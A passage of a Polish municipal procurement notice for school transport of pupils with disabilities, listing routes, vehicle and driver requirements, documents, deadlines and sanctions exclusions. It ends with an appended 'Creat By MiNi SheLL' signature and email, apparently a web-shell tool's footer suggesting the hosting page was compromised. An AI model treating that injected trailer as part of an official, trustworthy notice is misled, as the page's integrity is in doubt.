województwa wielkopolskiego na podstawie art. 5 ustawy z dnia 6 września 2001 roku o transporcie drogowym (Dz.U. z 2022 r. poz. 2201, ze zm.). Terminy ważności w/w dokumentów muszą obejmować okres realizacji zamówienia.<br/><br/>c)	sytuacji ekonomicznej i finansowej<br/>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na łączną kwotę równą co najmniej 400 000,00 zł (słownie: czterysta tysięcy złotych).<br/>(W przypadku wartości w walucie obcej wartość podlega przeliczeniu z zastosowaniem średniego kursu waluty obcej podawanego przez Narodowy Bank Polski dla dnia zawarcia umowy ubezpieczenia).<br/><br/>d)	zdolności technicznej i zawodowej<br/><br/>1)	Na potwierdzenie tego warunku Zamawiający wymaga, aby Wykonawca wykazał się doświadczeniem w wykonaniu usług, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 4 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 usług polegających na dowozie uczniów z orzeczeniem o niepełnosprawności do szkół (placówek oświatowych) przez cały okres trwania roku szkolnego, o wartości każdej z nich nie mniejszej niż 400 000 zł brutto (w przypadku kontraktów zawieranych w walucie obcej wartość robót podlega przeliczeniu z zastosowaniem średniego kursu waluty obcej podawanego przez Narodowy Bank Polski dla dnia zawarcia umowy).<br/>UWAGA:<br/>•	Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu (zamówienia/umowy) realizowanego przez wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), Zamawiający nie dopuszcza by Wykonawca polegał na doświadczeniu grupy wykonawców, której był członkiem, jeżeli faktycznie nie wykonywał wykazywanego zakresu robót. Zamawiający zastrzega możliwość zwrócenia się do wykonawcy o wyjaśnienia w zakresie faktycznie konkretnie wykonywanego zakresu robót oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z której wynika zakres obowiązków, czy wystawionych przez wykonawcę faktur.<br/><br/>2)	Na potwierdzenie tego warunku Zamawiający wymaga, aby Wykonawca wykazał, że dysponuje lub będzie dysponować niżej wymienionymi 5 pojazdami:<br/><br/>- Trasa nr 1:	Szkoła Podstawowa im. Adama Mickiewicza w Budziszewku, Specjalny Ośrodek Szkolno – Wychowawczy dla Dzieci Niewidomych w Owińskach oraz Ośrodek Szkolno – Wychowawczy dla Dzieci Niesłyszących w Poznaniu.<br/>Minimum 4 miejsca siedzące + 1 miejsce na wózek inwalidzki + opiekun<br/>- Trasa nr 2:	Rogoźno OSiR- SP Budziszewko, SP Parkowo, SP Gościejewo – Rogoźno<br/>Minimum 4 miejsca siedzące.<br/>- Trasa nr 3:	Szkoła Podstawowa im. Józefa Wybickiego w Parkowie, Przedszkole Samorządowe “Słoneczne Skrzaty” w Parkowie oraz Zespół Szkół Specjalnych w Kowanówku.<br/>Minimum 30 miejsc siedzących + opiekun.<br/>- Trasa nr 4:	SOS-W Wągrowiec, ZS1 Wągrowiec, SP3 Wągrowiec<br/>Minimum 10 miejsc siedzących + 1 miejsce na wózek inwalidzki + opiekun<br/>- Trasa nr 5:	Szkoła Podstawowa im. Jana Pawła II w Pruścach, Specjalny Ośrodek Szkolno – Wychowawczy w Wągrowcu, Zespół Szkół <br/>nr 1 w Wągrowcu, Progressio Centrum Wspomagania Rozwoju i Terapii Dziecka w Wągrowcu, Ośrodek Szkolno – Wychowawczy w Kłecku<br/>Minimum 5 miejsc siedzących + 1 miejsce na wózek inwalidzki + opiekun<br/><br/>3)	Na potwierdzenie tego warunku Zamawiający wymaga, aby Wykonawca wykazał, że dysponuje co najmniej pięcioma kierowcami, którzy winni posiadać stosowne uprawnienia tj.:<br/>- 3 kierowcy z prawem jazdy min. kat. D, świadectwem kwalifikacji oraz doświadczeniem w pracy na stanowisku kierowcy min. 5 lat,<br/>- 2 kierowcy z prawem jazdy min. kat. B, świadectwem kwalifikacji oraz doświadczeniem w pracy na stanowisku kierowcy min. 5 lat,<br/>skierowanymi przez wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat jej kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nią czynności oraz informację o podstawie do dysponowania tą osobą.<br/>Uwaga:<br/>-	staż zawodowy ustala się licząc od dnia uzyskania uprawnień do dnia otwarcia ofert. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenia lub dokumenty potwierdzające brak podstaw wykluczenia Wykonawcy z udziału w postępowaniu składane na żądanie Zamawiające:<br/>1. informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 108 ust. 1 pkt 1, 2 i 4 ustawy Pzp, wystawiona nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/><br/>2. oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie<br/>podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w art. 108 ust. 1 pkt 3, art. 108 ust. 1 pkt<br/><br/>4, art. 108 ust. 1 pkt 5, art. 108 ust. 1 pkt 6 i art. 109 ust. 1 pkt 1, 2, 3 i 4 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022<br/>r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego, sporządzone na podstawie wzoru stanowiącego Załącznik nr 7 do niniejszej SWZ;<br/><br/>3. odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej,<br/>sporządzonego nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 ustawy Pzp; Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa powyżej w pkt. XII.2, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/><br/>4. oświadczenia wykonawcy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o<br/>ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej sporządzone na podstawie wzoru stanowiącego Załącznik nr 6 do niniejszej SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenia lub dokumenty potwierdzające spełnianie przez Wykonawcę warunków udziału w postępowaniu składane na żądanie<br/>Zamawiającego:<br/><br/>1.Licencja na wykonywanie krajowego transportu drogowego w zakresie przewozu osób, o której mowa w punkcie X.1. lit. b SWZ;<br/><br/>2.Wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 4 lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej – w tym<br/>okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których usługi te zostały<br/>wykonane lub są wykonywane - potwierdzający warunki udziału w postępowaniu opisane w pkt X.1.d 1) SWZ - zgodnie z załącznikiem nr 3 do SWZ: Wykaz usług, oraz załączenie dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku<br/>świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy,<br/><br/>3.Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - potwierdzający warunki udziału w<br/>postępowaniu opisane w pkt X.1.d 3) SWZ i przygotowany zgodnie z Załącznikiem 4 do SWZ: Wykaz osób.<br/><br/>4.Wykaz sprzętu, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia<br/>publicznego wraz z informacją o podstawie do dysponowania tymi zasobami - potwierdzający warunki udziału w postępowaniu<br/>opisane w pkt X.1.d 2) SWZ i przygotowany zgodnie z Załącznikiem nr 1 do SWZ: Wykaz sprzętu<br/><br/>5.Dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia - potwierdzający warunek udziału w<br/>postępowaniu opisany w pkt X.1.c SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> .Formularz oferty – zgodny w treści i wypełniony na podstawie wzoru stanowiącego Załącznik nr 2 do niniejszej SWZ, sporządzony pod rygorem nieważności, w postaci elektronicznej i opatrzony kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.<br/>Oświadczenia lub dokumenty składane razem z ofertą:<br/><br/>2.Oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, zgodne z treścią Załącznika 8<br/>do niniejszej SWZ, aktualne na dzień składania ofert, celem potwierdzenia, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 108 ust. 1, art. 109 ust. 1 pkt 1,2, 3 i 4 ustawy Pzp, art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego oraz spełnia warunki udziału w postępowaniu określone w SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Dokument sporządza się pod rygorem nieważności w postaci elektronicznej i opatrzony kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym,<br/><br/>3.Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz<br/>z oświadczeniem, także oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu<br/>podmiotu udostępniającego zasoby, zgodne z treścią Załącznika 10 do niniejszej SWZ, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Zobowiązanie podmiotu udostępniającego zasoby, potwierdza, że stosunek łączący wykonawcę z podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>- zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>- sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>- czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/><br/>4.Pełnomocnictwa - winne być sporządzone w postaci elektronicznej i opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym, przez osoby uprawnione do reprezentowania firmy, zgodne z aktem rejestracyjnym lub kopii poświadczonej notarialnie przy użyciu podpisu elektronicznego.<br/><br/>5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, załączają oświadczenie, w którym ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/><br/>6. Dokument związany z samooczyszczeniem (jeżeli dot.) – tzw. „Self cleaning” — w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2, 5 lub art. 109 ust. 1 pkt 1, 2, 3 i 4 ustawy Pzp Wykonawca nie podlega wykluczeniu, jeżeli udowodni zamawiającemu, że spełnił łącznie następujące przestanki określone w art. 110 ust. 2 Pzp <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający w przedmiotowym postępowaniu wymaga wniesienia wadium.<br/>Wykonawcy zobowiązani są do wniesienia wadium w wysokości:<br/>13 000,00 zł (słownie trzynaście tysięcy złotych 00/100) <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego musi wynikać, które usługi lub roboty wykonają poszczególni wykonawcy. W przypadku polegania przez członków konsorcjum na uprawieniach, doświadczeniu, kwalifikacjach lub wykształceniu członka takiego konsorcjum, łączenie zdolności członków konsorcjum w celu potwierdzenia spełnienia warunków udziału w postępowaniu nie może następować w sposób dowolny. Liczy się rola, jaką członek grupy odegra przy realizacji zamówienia. Wymagane zdolności powinien posiadać co najmniej<br/>ten z konsorcjantów, który w ramach przyjętego wewnętrznie podziału zadań, wyznaczony zostanie do realizowania danej części zamówienia, z którą wiąże się obowiąze posiadania konkretnych uprawnień, doświadczenia, kwalifikacji lub<br/>wykształcenia. Powyższe oświadczenie ma na celu umożliwienie zamawiającemu weryfikację czy planowany podział zadań pomiędzy członków konsorcjum zapewnia realne wykorzystanie deklarowanych zasobów w zakresie wymagań postawionych w pkt. X SWZ. (Wykonawcy składają oświadczenia w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, przez osoby upoważnione do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub w innym dokumencie) - zgodne z treścią Załącznika 9 do SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia, <br/>co najmniej jednej z okoliczności wymienionych poniżej, z podawaniem warunków ich wprowadzenia:<br/><br/>1) zmiana terminu realizacji umowy w przypadku działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne, epidemie), mającej bezpośredni wpływ na terminowość wykonania usługi,<br/><br/>2)	zmiana przedmiotu umowy – jeżeli konieczność wprowadzenia zmian jest skutkiem zmiany przepisów prawa,<br/><br/>3)	zmiana wynagrodzenia – w następstwie zmiany przepisów o podatku od towarów i usług (VAT),<br/><br/>4)	Zmiana w następstwie wystąpienia wyjątkowych okoliczności, niezależnych od Stron umowy, których nie mogły one przewidzieć w chwili zawierania umowy wpływających na jej realizację,<br/><br/>5)	Zmiana tras i kilometrów będzie skutkować proporcjonalnym wzrostem lub obniżeniem wynagrodzenia. Cena jednostkowa pracy przewozowej na określonych trasach ustalona w § 3 ust.3 nie podlega zmianie.<br/><br/>2.	Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: <br/><br/>1)	przedmiot umowy – jeżeli konieczność wprowadzenia zmian jest skutkiem zmiany przepisów prawa, <br/><br/>2)	warunki techniczne pojazdu – jeżeli konieczność wprowadzenia zmian wynika z okoliczności, niezależnych od Stron umowy, których nie mogły one przewidzieć w chwili zawierania umowy, wpływających na jej realizację, <br/><br/>3)	wynagrodzenie – w następstwie zmiany przepisów prawnych oraz w wyniku realizacji uprawnienia Zamawiającego, w związku ze zmianą, o której mowa w ust. 2. <br/><br/>3.	Dokonanie zmian, o których mowa w ust. 1 wymaga zawarcia aneksu do umowy, w formie pisemnej pod rygorem nieważności.<br/><br/>4. Zakazuje się zmiany umowy, jeżeli zmiana jest wymuszona uchybieniem czy naruszeniem umowy przez Wykonawcę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-01 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/rogozno. 2. Szczegółowa instrukcja dla Wykonawców dotycząca złożenia, zmiany i wycofania oferty znajduje się na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-01 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-30</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I. Uzupełnienie do punktu 5.2.) Fakultatywne podstawy wykluczenia.<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie:<br/><br/>1. art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego:<br/><br/>1) wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy;<br/><br/>2) wykonawcę oraz uczestnika konkursu, którego beneficjentem<br/>rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu<br/>terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o<br/>ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym<br/>mowa w art. 1 pkt 3 ustawy;<br/><br/>3) wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29<br/>września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką<br/>dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy.<br/><br/>2. art. 5k rozporządzenia Rady (UE) nr 2022/5764 z dnia 8 kwietnia 2022 r. w sprawie zmiany rozporządzenia (UE) nr<br/>833/2014 dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie:<br/>zakazuje się udzielania lub dalszego wykonywania wszelkich zamówień publicznych lub koncesji (…) na rzecz lub z udziałem:<br/>a) obywateli rosyjskich lub osób fizycznych lub prawnych, podmiotów lub organów z siedzibą w Rosji,<br/>b) osób prawnych, podmiotów lub organów, do których prawa własności bezpośrednio lub pośrednio w ponad 50% należą<br/>do podmiotu, o którym mowa w lit. a) niniejszego ustępu; lub<br/>c) osób fizycznych lub prawnych, podmiotów lub organów działających w imieniu lub pod kierunkiem podmiotu, o którym<br/>mowa w lit. a) lub b) niniejszego ustępu; w tym podwykonawców, dostawców lub podmiotów, na których zdolności polega<br/>się w rozumieniu dyrektyw w sprawie zamówień publicznych, w przypadku gdy przypada na nich ponad 10 % wartości<br/>zamówienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com